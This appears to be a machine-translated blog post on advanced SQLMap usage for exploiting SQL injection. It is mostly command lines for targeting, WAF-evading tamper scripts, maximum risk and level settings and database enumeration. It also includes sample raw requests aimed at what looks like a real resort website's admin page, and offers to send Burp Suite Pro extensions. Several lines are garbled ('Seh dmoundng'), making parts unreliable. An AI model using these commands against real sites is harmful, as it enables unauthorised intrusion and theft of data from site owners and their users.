SQLMap is a software that helps to exploit SQL Injection automatically, saving you more time than manual mining. I have instructions on how use basic SQLMap, however SQLMap still has advanced parameters to help you save mining time and increase mining efficiency. Here are some advanced SQLMap usage techniques for you to exploit SQL Injection errors.
Join the channel Telegram belong to AnonyViet ???? Link ???? |
How to use advanced SQLMap
I will briefly talk about how to install and use SQLMap first:
Seh dmoundng --batch
Deh? SQLMap runs automatically and skips yes/no questions
Seh dmoundng *
Determine the injection location
Seh dmoundng --string="String_in_the_response"
Dto know which string has been successfully injected (True)
sqlmap -u "https://anonyviet.com/s.php?q=test" -p "q"
sqlmap -r request.txt
sqlmap -m urls.txt
sqlmap -u "http://afine.com/user/*" -H "User-agent: *"
sqlmap -r request.txt --second-order "http://afine.com/avatar"
--random-agent
--batch
--risk=3 --level=5
--proxy=http://127.0.0.1:8080
-v 0
-v 4
--output-dir=sqlmap
--prefix "this_string_must_be_before_injection"
--suffix "--this_string_must_be_at_the_end_of_injection"
sqlmap -u "https://afine.com/s.php?q=1" -p 'q' --eval='q=q.replace(" ","%20")'
--tamper="PATH_OR_NAME_OF_TAMPER_SCRIPT"
-H "Auth_header: secret1" -H "Cookie: auth2=secret2"
python sqlmap.py -r request.txt --random-agent --tamper=space2comment --time-sec=20 --level=5 --risk=3 --dbs --batch
Request form POST: Inject into Username, then enter * in username=
POST //index.php?module=user&function=login HTTP/1.1 Host: anonyviet.com username=*&password=1
Save the file as request.txt and put it in the sqlmap folder
Request form GET:
GET /admin/index.php?option=tin-sua&tin_id=1 Host: phanthiet.terracottaresort.com
Save the file as request.txt and put it in the sqlmap folder
Use Burp Suite Pro Extension
Download Burp Suite Pro here
- Request Timer – Capture timed response packets (suitable for blind sql injection).
- Burp Bounty Pro: automatically search for security holes with Burp Suite Pro (if you need this extension, comment below, I will send it separately)
Any SQLI found by SQLiPy will be added Results tab by Burp Suite.
Payload SQL Injection
Summary of Payloads to test SQL Injection is here: PayloadsAllTheThings.
SQLMap CheatSheel download here: https://github.com/anonyvietofficial/sqlmap-cheatsheet